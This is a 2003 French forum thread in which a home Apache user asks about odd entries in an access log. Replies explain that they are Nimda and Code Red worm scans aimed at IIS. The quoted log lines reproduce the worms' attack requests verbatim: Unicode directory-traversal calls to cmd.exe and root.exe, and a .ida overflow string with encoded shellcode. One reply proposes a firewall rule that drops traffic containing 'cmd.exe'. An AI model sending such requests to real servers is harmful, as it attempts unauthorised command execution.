[apache] accés bizare

accés bizare [apache] - réseaux et sécurité - Linux et OS Alternatifs

Marsh Posté le 04-04-2003 à 02:06:59    

J'ai easyphp qui tourne sur ma machine et là, j'ai des lignes étonantes dans le log des pages demandés :
 


*.*.*.* - - [03/Apr/2003:23:37:17 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 314
*.*.*.* - - [03/Apr/2003:23:37:19 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 312
*.*.*.* - - [03/Apr/2003:23:37:21 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
*.*.*.* - - [03/Apr/2003:23:37:23 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
 
*.*.*.* - - [03/Apr/2003:23:37:25 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
*.*.*.* - - [03/Apr/2003:23:37:27 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 353
*.*.*.* - - [03/Apr/2003:23:37:30 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 353
*.*.*.* - - [03/Apr/2003:23:37:34 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 369
*.*.*.* - - [03/Apr/2003:23:37:37 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
*.*.*.* - - [03/Apr/2003:23:37:39 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
*.*.*.* - - [03/Apr/2003:23:37:41 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
*.*.*.* - - [03/Apr/2003:23:37:42 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
*.*.*.* - - [03/Apr/2003:23:37:44 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 319
*.*.*.* - - [03/Apr/2003:23:37:46 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 319
*.*.*.* - - [03/Apr/2003:23:37:48 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
*.*.*.* - - [03/Apr/2003:23:37:49 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336

 
J'ai masqué l'IP mais a chaque fois c'était la même.
Mon apache a été installé avec easyphp sous win2000.
 
J'ai pas de firewall sur cette machine là mais elle va bientôt ce retrouver derière un poste sous FreeBSD.
 
Ma première question est de savoir ce que c'est que cette BIP. C'est une tentative d'attaque ou quoi? Apache, il en est sensible à ça ou bien il est bien protégé? :)
Je ne penses pas que cette "attaque" ai réussi à provoquer quoi que ce soit mais j'aimerais avoir l'avi de conaisseurs. Mon serveur apache est habituellement éteint plus de 22 heures par jours vu que je l'allumes que pour faire des tests en local.
Y a t'il des chôse que je doives modifier pour éviter au maximum les problèmes de sécurité en attendant d'avoir finis la configuration de ma future passerelle?
 
PS : L'IP en question n'est ni mon IP, ni celle de la personne qui était entrein de récupérer un fichier sur mon serveur (je sais, c'est pas bien, mais j'ai pas envie de configurer un serveur ftp sous windows rien que pour un fichier tous les deux mois. ;) )
 
Merci d'avance pour vos conseils et précisions. :)

Reply

Marsh Posté le 04-04-2003 à 02:06:59   

Reply

Marsh Posté le 04-04-2003 à 02:15:17    

c'est un vulgaire IIS géré par un admin incompétent .
tu peux faire un  mv /dev/null.

Reply

Marsh Posté le 04-04-2003 à 03:28:46    

J'en ai long de même sur mon serveur. C chiant.  
 
Sans troller si Feu Desuetcr_b connaissait Unix, on en aurai pas autant ....
Vive unix vive linux !  

Reply

Marsh Posté le 04-04-2003 à 09:29:16    

c'est juste que l'ip *.*.*.* est infecte par le virus nimbda et que l'admin n'a pas desinfecte la machine.
Ce virus cherche a exploiter la faille unicode sur du IIS
Pour ton linux c'est cool, ca te fera rien.
Si ca te saoul d'avoir ca dans tes logs, install le patch "string" de chez patch-o-matic et DROP tout ce qui contient "cmd.exe"
Tu seras trankill, plus de logs de ce type :)

Reply

Marsh Posté le 06-04-2003 à 19:34:25    

Petite remarque.
Ce poste là, il est sous windows, j'ai pas encore finis de tout configuré sur ma passerelle mais normalement, elle sera devant tout le reste dès ce soir. :)
En fait, dès que ma conection revient en ligne, je tentes le changement. (conection pra freebox planté a cause d'emule)
 
Tiens, d'ailleur, les lignes du genre
 
*.*.*.* - - [04/Apr/2003:16:22:26 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 309
 
c'est le même problème ou alors c'est autre chôse?
Bon, vu que mon serveur est un apache, je ne crainds pas nimda en tout cas. :) C'est déjà ça. ;)

Reply

Marsh Posté le 06-04-2003 à 19:38:37    

codered aussi est actif sur le pourrisage de log ...

Reply

Marsh Posté le 07-04-2003 à 10:10:25    

HuGoBioS a écrit :

codered aussi est actif sur le pourrisage de log ...

Merci pour tout. :)
Bon, tant que je crainds rien, c'est pas génant et comme je retraite pas mes logs et qu'apache est pas lancé souvent, c'est vraiment pas génant. :)

Reply

Marsh Posté le 07-04-2003 à 12:50:12    

c marrant mais j'avais jamais fait gaffe a mes log apache
 
j'ai des pages de cmd.exe machin truc alors que mon server ne sert qu'en local ou pour 2/3 potes  :lol:  
 
scanner les ip de mamadoo, en voila une idée qu'elle est bonne  [:bigsmiley]


---------------
Le droit à la différence s'arrête là où ça commence à m'emmerder sérieusement.
Reply

Marsh Posté le 07-04-2003 à 13:24:14    

Zaib3k a écrit :


scanner les ip de mamadoo, en voila une idée qu'elle est bonne  [:bigsmiley]  


 
Pourquoi Wanadoo en particulier ? :p
 
De toute façon  des particuliers qui installent IIS doit pas y en avoir des masses. ;)

Reply

Marsh Posté le 07-04-2003 à 13:33:25    

cmotsch a écrit :


 
Pourquoi Wanadoo en particulier ? :p
 
De toute façon  des particuliers qui installent IIS doit pas y en avoir des masses. ;)


 
parce que je suis chez wanadoo.
c'est une idée stupide de scanner ce genre d'ip, ya presque que des particuliers derriere, a moins que l'on en veuille a mon super site web  :lol:  ( pas sous IIS  :non: )


---------------
Le droit à la différence s'arrête là où ça commence à m'emmerder sérieusement.
Reply

Marsh Posté le 07-04-2003 à 13:33:25   

Reply

Marsh Posté le 07-04-2003 à 17:23:05    

Zaib3k a écrit :


 
parce que je suis chez wanadoo.
c'est une idée stupide de scanner ce genre d'ip, ya presque que des particuliers derriere, a moins que l'on en veuille a mon super site web  :lol:  ( pas sous IIS  :non: )

Pareil pour moi. :)
A par que je suis sous freebox mais c'est fout le nombre de lignes qui peuvent ce rajouter en 24 heures sans qu'on ai référencé son ordi personnel nulle part. :)

Reply

Marsh Posté le 07-04-2003 à 18:07:05    

cmotsch a écrit :


De toute façon  des particuliers qui installent IIS doit pas y en avoir des masses. ;)


 
Il est installé par défaut avec 2000 serveur, et avoir 2000 serveur, ça fait bien(tm) sur S&R


---------------
brisez les rêves des gens, il en restera toujours quelque chose...  -- laissez moi troller sur discu !
Reply

Marsh Posté le 07-04-2003 à 19:08:33    

kadreg a écrit :


 
Il est installé par défaut avec 2000 serveur, et avoir 2000 serveur, ça fait bien(tm) sur S&R


 
Non sur S&R c'est plutôt aware d'avoir un Win XP Pro corporate SP1 customisé (de préférence en look MacOS, ça fait du genre "chuis un rebelz" ), avec 42 icônes qui font des bruits de sabre laser quand on passe la souris dessus.
 
 [:pioupiou]

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed